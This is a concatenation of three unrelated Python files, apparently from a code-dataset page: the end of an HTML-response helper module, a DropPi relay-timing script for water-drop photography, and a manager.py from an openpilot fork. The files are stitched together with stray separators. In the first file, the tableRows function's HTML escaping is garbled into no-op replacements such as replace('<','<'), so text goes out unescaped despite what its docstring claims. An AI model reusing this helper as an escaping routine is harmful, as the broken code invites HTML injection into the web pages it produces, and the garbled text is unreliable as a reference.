.cell{border-top:1.0pt solid windowtext;border-right:.5pt solid windowtext;border-bottom:.5pt solid windowtext;border-left:.5pt solid windowtext;}
.blockedCell{border-top:1.0pt solid windowtext;border-right:.5pt solid windowtext;border-bottom:.5pt solid windowtext;border-left:.5pt solid windowtext;background:#eee;}
</STYLE>
</head>
<body>
%s
</body>
</html>
''' % (script, body)
def tableRows(lines, header=None):
"""Wraps lines of text into a one-column table (for display of text results of operations, such as processing messages and status, to web browser).
Replaces any *&* with *&* and *<* with *<*.
:param lines: Sequence (list or tuple) of line strings.
:type lines: [str]
:param header: Optional header text for top row of table.
:type header: str
:returns: html - <table> html string.
"""
return '<table cellspacing="0" cellpadding="4">%s\n</table>' % (
("<tr><th>%s</th></tr>" % header if header else "") +
"\n".join("<tr><td>%s</td></tr>" % line.replace("&","&").replace("<","<") for line in lines))
def errorReport(errors, media="html"):
"""Wraps lines of error text into specified media type for return of result to a request.
:param errors: Sequence (list or tuple) of error strings.
:type errors: [str]
:param media: Type of result requestd.
:type media: str
:returns: html - <table> html string.
"""
if media == "text":
response.content_type = 'text/plain; charset=UTF-8'
return '\n'.join(errors)
else:
response.content_type = 'text/html; charset=UTF-8'
return htmlBody(tableRows(errors, header=_("Messages")))
def multipartResponse(parts):
# call with ( (filename, contentType, content), ...)
boundary='----multipart-boundary-%s----' % (uuid.uuid1(),)
response.content_type = 'multipart/mixed; boundary=%s' % (boundary,)
buf = []
for filename, contentType, content in parts:
buf.append("\r\n" + boundary + "\r\n")
buf.append('Content-Disposition: attachment; filename="{0}";\r\n'.format(filename))
buf.append('Content-Type: {0};\r\n'.format(contentType))
buf.append('Content-Length: {0}\r\n'.format(len(content)))
buf.append('\r\n')
buf.append(content)
buf.append("\r\n" + boundary + "\r\n")
s = ''.join(buf)
response.content_length = len(s)
return s
|
DropPiUI_Dropper.py
|
#!/usr/bin/python
"""*****************************************************************************************************************
DropPi by Kim Dalmeijer, 2021
Relay board 0: valve relays [VALVE1, VALVE2, VALVE3, VALVE4]
Relay board 1: flash and camera relays [CAM, FLASH1, FLASH2, FLASH3]
********************************************************************************************************************"""
from __future__ import print_function
import logging
import sys
import time
import ctypes
import threading
from DropPi_lib import *
# Load libc shared library:
libc = ctypes.CDLL('libc.so.6')
# General Definitions
DEF_FLASH_DELAY = 30 # (ms)
DEF_CAMERA_DELAY = 2500 # (ms)
MIRROR_LOCKUP = True
# Definitions of timings, these are defaults which will be set with the GUI before execution of the firing process
# Each timing consists of the starttime in ms, and the duration in ms. Valve timings have 4 slots (4 drops).
# Camera and flash timings have a single slot
# Timings for VALVE_1
TIMES_VALVE_1 = list()
TIMES_VALVE_2 = list()
TIMES_VALVE_3 = list()
TIMES_VALVE_4 = list()
TIME_CAMERA = 100
TIME_FLASH = ''
# placeholders for elapsed thread times
v1_elapsed_time = 0
v2_elapsed_time = 0
v3_elapsed_time = 0
v4_elapsed_time = 0
c_elapsed_time = 0
f_elapsed_time = 0
def delayus(us):
""" Delay microseconds with libc usleep() using ctypes. """
libc.usleep(int(us))
# ------------------------------------
def thread_valve_1_function():
global v1_elapsed_time
start_time = time.perf_counter()
if MIRROR_LOCKUP:
delayus(700 * 1000)
for i in range(len(TIMES_VALVE_1)):
delayus(float(TIMES_VALVE_1[i][0]) * 1000)
relay_on(VALVE_1)
delayus(float(TIMES_VALVE_1[i][1]) * 1000)
relay_off(VALVE_1)
v1_elapsed_time = time.perf_counter() - start_time
def thread_valve_2_function():
global v2_elapsed_time
start_time = time.perf_counter()
if MIRROR_LOCKUP:
delayus(700 * 1000)
for i in range(len(TIMES_VALVE_2)):
delayus(float(TIMES_VALVE_2[i][0]) * 1000)
relay_on(VALVE_2)
delayus(float(TIMES_VALVE_2[i][1]) * 1000)
relay_off(VALVE_2)
v2_elapsed_time = time.perf_counter() - start_time
def thread_valve_3_function():
global v3_elapsed_time
start_time = time.perf_counter()
if MIRROR_LOCKUP:
delayus(700 * 1000)
for i in range(len(TIMES_VALVE_3)):
delayus(float(TIMES_VALVE_3[i][0]) * 1000)
relay_on(VALVE_3)
delayus(float(TIMES_VALVE_3[i][1]) * 1000)
relay_off(VALVE_3)
v3_elapsed_time = time.perf_counter() - start_time
def thread_valve_4_function():
global v4_elapsed_time
start_time = time.perf_counter()
if MIRROR_LOCKUP:
delayus(700 * 1000)
for i in range(len(TIMES_VALVE_4)):
delayus(float(TIMES_VALVE_4[i][0]) * 1000)
relay_on(VALVE_4)
delayus(float(TIMES_VALVE_4[i][1]) * 1000)
relay_off(VALVE_4)
v4_elapsed_time = time.perf_counter() - start_time
def thread_camera_function():
global c_elapsed_time
start_time = time.perf_counter()
if MIRROR_LOCKUP:
relay_on(CAMERA)
delayus(150 * 1000)
relay_off(CAMERA)
delayus(550 * 1000)
delayus(TIME_CAMERA * 1000)
relay_on(CAMERA)
delayus(DEF_CAMERA_DELAY * 1000)
relay_off(CAMERA)
c_elapsed_time = time.perf_counter() - start_time
def thread_flash_function(flash1, flash2, flash3):
global f_elapsed_time
start_time = time.perf_counter()
# WAIT FOR MIRROR LOCKUP IF NEEDED
if MIRROR_LOCKUP:
delayus(700 * 1000)
# TURN ON
delayus(float(TIME_FLASH) * 1000)
if not flash1:
TMPFLASH_1 = 0
else:
TMPFLASH_1 = FLASH_1
if not flash2:
TMPFLASH_2 = 0
else:
TMPFLASH_2 = FLASH_2
if not flash3:
TMPFLASH_3 = 0
else:
TMPFLASH_3 = FLASH_3
relay_on(TMPFLASH_1, TMPFLASH_2, TMPFLASH_3)
# TURN OFF
delayus(DEF_FLASH_DELAY * 1000)
relay_off(TMPFLASH_1, TMPFLASH_2, TMPFLASH_3)
f_elapsed_time = time.perf_counter() - start_time
def main(**kwargs):
# do whatever and return 0 for success and an
# integer x, 1 <= x <= 256 for failure
logformat = '%(asctime)s.%(msecs)03d %(message)s'
logging.basicConfig(format=logformat, level=logging.INFO, datefmt='%H:%M:%S')
# set variables for this run from what the main has passed
global DEF_FLASH_DELAY
global DEF_CAMERA_DELAY
global TIME_CAMERA
global TIME_FLASH
global TIMES_VALVE_1
global TIMES_VALVE_2
global TIMES_VALVE_3
global TIMES_VALVE_4
global MIRROR_LOCKUP
global v1_elapsed_time
global v2_elapsed_time
global v3_elapsed_time
global v4_elapsed_time
global c_elapsed_time
global f_elapsed_time
DEF_FLASH_DELAY = float(kwargs['flash_def'])
logging.info("FLASH DELAY: %i", DEF_FLASH_DELAY)
DEF_CAMERA_DELAY = float(kwargs['cam_def'])
logging.info("CAMERA DELAY: %i", DEF_CAMERA_DELAY)
TIME_CAMERA = float(kwargs['cam_on'])
logging.info("CAMERA TIME: %i", TIME_CAMERA)
TIME_FLASH = float(kwargs['flash_on'])
logging.info("FLASH TIME: %i", TIME_FLASH)
MIRROR_LOCKUP = kwargs['mirror']
TIMES_VALVE_1 = kwargs['v1times']
TIMES_VALVE_2 = kwargs['v2times']
TIMES_VALVE_3 = kwargs['v3times']
TIMES_VALVE_4 = kwargs['v4times']
logging.info("DropPi : before creating threads")
thread_valve_1 = threading.Thread(target=thread_valve_1_function)
thread_valve_2 = threading.Thread(target=thread_valve_2_function)
thread_valve_3 = threading.Thread(target=thread_valve_3_function)
thread_valve_4 = threading.Thread(target=thread_valve_4_function)
thread_camera = threading.Thread(target=thread_camera_function)
thread_flash = threading.Thread(target=thread_flash_function, args=(
kwargs['flash1_on'], kwargs['flash2_on'], kwargs['flash3_on']))
logging.info("DropPi : before running threads")
thread_camera.start()
thread_valve_1.start()
thread_valve_2.start()
thread_valve_3.start()
thread_valve_4.start()
thread_flash.start()
logging.info("DropPi : waiting for all threads to finish")
thread_camera.join()
thread_valve_1.join()
thread_valve_2.join()
thread_valve_3.join()
thread_valve_4.join()
thread_flash.join()
logging.info("DropPi : all done")
# calculate error from elapsed times and display results to indicate how trustworthy the app runs
# if an elapsed time is zero, the valve of flash for that time was not used
# V1 ERROR CALCULATION
calculated_elapsed_time = 0
if v1_elapsed_time != 0:
if MIRROR_LOCKUP:
calculated_elapsed_time += 700
for i in range(len(TIMES_VALVE_1)):
calculated_elapsed_time += float(TIMES_VALVE_1[i][0])
calculated_elapsed_time += float(TIMES_VALVE_1[i][1])
calculated_elapsed_time = calculated_elapsed_time / 1000
try:
calculated_error = ((calculated_elapsed_time - v1_elapsed_time) / calculated_elapsed_time) * 100
except ZeroDivisionError:
calculated_error = 0
logging.info(
f'Valve1 timings: real; {v1_elapsed_time:.4f},'
f' calculated; {calculated_elapsed_time},'
f' error; {abs(calculated_error):.1f}%')
# V2 ERROR CALCULATION
calculated_elapsed_time = 0
if v2_elapsed_time != 0:
if MIRROR_LOCKUP:
calculated_elapsed_time += 700
for i in range(len(TIMES_VALVE_2)):
calculated_elapsed_time += float(TIMES_VALVE_2[i][0])
calculated_elapsed_time += float(TIMES_VALVE_2[i][1])
calculated_elapsed_time = calculated_elapsed_time / 1000
try:
calculated_error = ((calculated_elapsed_time - v2_elapsed_time) / calculated_elapsed_time) * 100
except ZeroDivisionError:
calculated_error = 0
logging.info(
f'Valve2 timings: real; {v2_elapsed_time:.4f},'
f' calculated; {calculated_elapsed_time},'
f' error; {abs(calculated_error):.1f}%')
# V3 ERROR CALCULATION
calculated_elapsed_time = 0
if v3_elapsed_time != 0:
if MIRROR_LOCKUP:
calculated_elapsed_time += 700
for i in range(len(TIMES_VALVE_3)):
calculated_elapsed_time += float(TIMES_VALVE_3[i][0])
calculated_elapsed_time += float(TIMES_VALVE_3[i][1])
calculated_elapsed_time = calculated_elapsed_time / 1000
try:
calculated_error = ((calculated_elapsed_time - v3_elapsed_time) / calculated_elapsed_time) * 100
except ZeroDivisionError:
calculated_error = 0
logging.info(
f'Valve3 timings: real; {v3_elapsed_time:.4f},'
f' calculated; {calculated_elapsed_time},'
f' error; {abs(calculated_error):.1f}%')
# V4 ERROR CALCULATION
calculated_elapsed_time = 0
if v4_elapsed_time != 0:
if MIRROR_LOCKUP:
calculated_elapsed_time += 700
for i in range(len(TIMES_VALVE_4)):
calculated_elapsed_time += float(TIMES_VALVE_4[i][0])
calculated_elapsed_time += float(TIMES_VALVE_4[i][1])
calculated_elapsed_time = calculated_elapsed_time / 1000
try:
calculated_error = ((calculated_elapsed_time - v4_elapsed_time) / calculated_elapsed_time) * 100
except ZeroDivisionError:
calculated_error = 0
logging.info(
f'Valve4 timings: real; {v4_elapsed_time:.4f},'
f' calculated; {calculated_elapsed_time},'
f' error; {abs(calculated_error):.1f}%')
# CAMERA ERROR CALCULATION
calculated_elapsed_time = 0
if c_elapsed_time != 0:
if MIRROR_LOCKUP:
calculated_elapsed_time += 700
calculated_elapsed_time += float(TIME_CAMERA)
calculated_elapsed_time += float(DEF_CAMERA_DELAY)
calculated_elapsed_time = calculated_elapsed_time / 1000
try:
calculated_error = ((calculated_elapsed_time - c_elapsed_time) / calculated_elapsed_time) * 100
except ZeroDivisionError:
calculated_error = 0
logging.info(
f'Camera timings: real; {c_elapsed_time:.4f},'
f' calculated; {calculated_elapsed_time},'
f' error; {abs(calculated_error):.1f}%')
# FLASH ERROR CALCULATION
calculated_elapsed_time = 0
if f_elapsed_time != 0:
if MIRROR_LOCKUP:
calculated_elapsed_time += 700
calculated_elapsed_time += float(TIME_FLASH)
calculated_elapsed_time += float(DEF_FLASH_DELAY)
calculated_elapsed_time = calculated_elapsed_time / 1000
try:
calculated_error = ((calculated_elapsed_time - f_elapsed_time) / calculated_elapsed_time) * 100
except ZeroDivisionError:
calculated_error = 0
logging.info(
f'Flash timings: real; {f_elapsed_time:.4f},'
f' calculated; {calculated_elapsed_time},'
f' error; {abs(calculated_error):.1f}%')
return 0
# Now see what we're supposed to do next
if __name__ == "__main__":
sys.exit(main())
|
manager.py
|
#!/usr/bin/env python3
import datetime
import os
import signal
import subprocess
import sys
import traceback
from multiprocessing import Process
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params, ParamKeyType
from common.text_window import TextWindow
from selfdrive.boardd.set_time import set_time
from selfdrive.hardware import HARDWARE, PC, EON
from selfdrive.manager.helpers import unblock_stdout
from selfdrive.manager.process import ensure_running, launcher
from selfdrive.manager.process_config import managed_processes
from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID
from selfdrive.swaglog import cloudlog, add_file_handler
from selfdrive.version import is_dirty, get_commit, get_version, get_origin, get_short_branch, \
terms_version, training_version, is_comma_remote
from selfdrive.hardware.eon.apk import system
sys.path.append(os.path.join(BASEDIR, "pyextra"))
def manager_init():
# update system time from panda
set_time(cloudlog)
# save boot log
#subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START)
default_params = [
("CompletedTrainingVersion", "0"),
("HasAcceptedTerms", "0"),
("OpenpilotEnabledToggle", "1"),
("CommunityFeaturesToggle", "1"),
("IsMetric", "1"),
# HKG
("UseClusterSpeed", "0"),
("LongControlEnabled", "0"),
("MadModeEnabled", "1"),
("IsLdwsCar", "0"),
("LaneChangeEnabled", "0"),
("AutoLaneChangeEnabled", "0"),
("SccSmootherSlowOnCurves", "0"),
("SccSmootherSyncGasPressed", "0"),
("StockNaviDecelEnabled", "0"),
("KeepSteeringTurnSignals", "0"),
("WarningOverSpeedLimit", "0"),
("DisableOpFcw", "0"),
("ShowDebugUI", "0"),
("NewRadarInterface", "0"),
]
if not PC:
default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')))
if params.get_bool("RecordFrontLock"):
params.put_bool("RecordFront", True)
if not params.get_bool("DisableRadar_Allow"):
params.delete("DisableRadar")
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put_bool("Passive", bool(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set version params
params.put("Version", get_version())
params.put("TermsVersion", terms_version)
params.put("TrainingVersion", training_version)
params.put("GitCommit", get_commit(default=""))
params.put("GitBranch", get_short_branch(default=""))
params.put("GitRemote", get_origin(default=""))
# set dongle id
reg_res = register(show_spinner=True)
if reg_res:
dongle_id = reg_res
else:
serial = params.get("HardwareSerial")
raise Exception(f"Registration failed for device {serial}")
os.environ['DONGLE_ID'] = dongle_id # Needed for swaglog
if not is_dirty():
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=get_version(), dirty=is_dirty(),
device=HARDWARE.get_device_type())
if is_comma_remote() and not (os.getenv("NOLOG") or os.getenv("NOCRASH") or PC):
crash.init()
crash.bind_user(id=dongle_id)
crash.bind_extra(dirty=is_dirty(), origin=get_origin(), branch=get_short_branch(), commit=get_commit(),
device=HARDWARE.get_device_type())
def manager_prepare():
for p in managed_processes.values():
p.prepare()
def manager_cleanup():
# send signals to kill all procs
for p in managed_processes.values():
p.stop(block=False)
# ensure all are killed
for p in managed_processes.values():
p.stop(block=True)
cloudlog.info("everything is dead")
def manager_thread():
if EON:
Process(name="shutdownd", target=launcher, args=("selfdrive.shutdownd", "shutdownd")).start()
system("am startservice com.neokii.optool/.MainService")
Process(name="road_speed_limiter", target=launcher, args=("selfdrive.road_speed_limiter", "road_speed_limiter")).start()
cloudlog.bind(daemon="manager")
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
params = Params()
ignore = []
if params.get("DongleId", encoding='utf8') == UNREGISTERED_DONGLE_ID:
ignore += ["manage_athenad", "uploader"]
if os.getenv("NOBOARD") is not None:
ignore.append("pandad")
if os.getenv("BLOCK") is not None:
ignore += os.getenv("BLOCK").split(",")
ensure_running(managed_processes.values(), started=False, not_run=ignore)
started_prev = False
sm = messaging.SubMaster(['deviceState'])
pm = messaging.PubMaster(['managerState'])
while True:
sm.update()
not_run = ignore[:]
if sm['deviceState'].freeSpacePercent < 5:
not_run.append("loggerd")
started = sm['deviceState'].started
driverview = params.get_bool("IsDriverViewEnabled")
ensure_running(managed_processes.values(), started, driverview, not_run)
# trigger an update after going offroad
if started_prev and not started and 'updated' in managed_processes:
os.sync()
managed_processes['updated'].signal(signal.SIGHUP)
started_prev = started
running = ' '.join("%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name)
for p in managed_processes.values() if p.proc)
print(running)
cloudlog.debug(running)
# send managerState
msg = messaging.new_message('managerState')
msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()]
pm.send('managerState', msg)
# Exit main loop when uninstall/shutdown/reboot is needed
shutdown = False
for param in ("DoUninstall", "DoShutdown", "DoReboot"):
if params.get_bool(param):
cloudlog.warning(f"Shutting down manager - {param} set")
shutdown = True
if shutdown:
break
def main():
prepare_only = os.getenv("PREPAREONLY") is not None
manager_init()
# Start UI early so prepare can happen in the background
if not prepare_only:
managed_processes['ui'].start()
manager_prepare()
if prepare_only:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
manager_cleanup()
params = Params()
if params.get_bool("DoUninstall"):
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
elif params.get_bool("DoReboot"):
cloudlog.warning("reboot")
HARDWARE.reboot()
elif params.get_bool("DoShutdown"):
cloudlog.warning("shutdown")
HARDWARE.shutdown()
if __name__ == "__main__":
unblock_stdout()
try:
main()
except Exception:
add_file_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.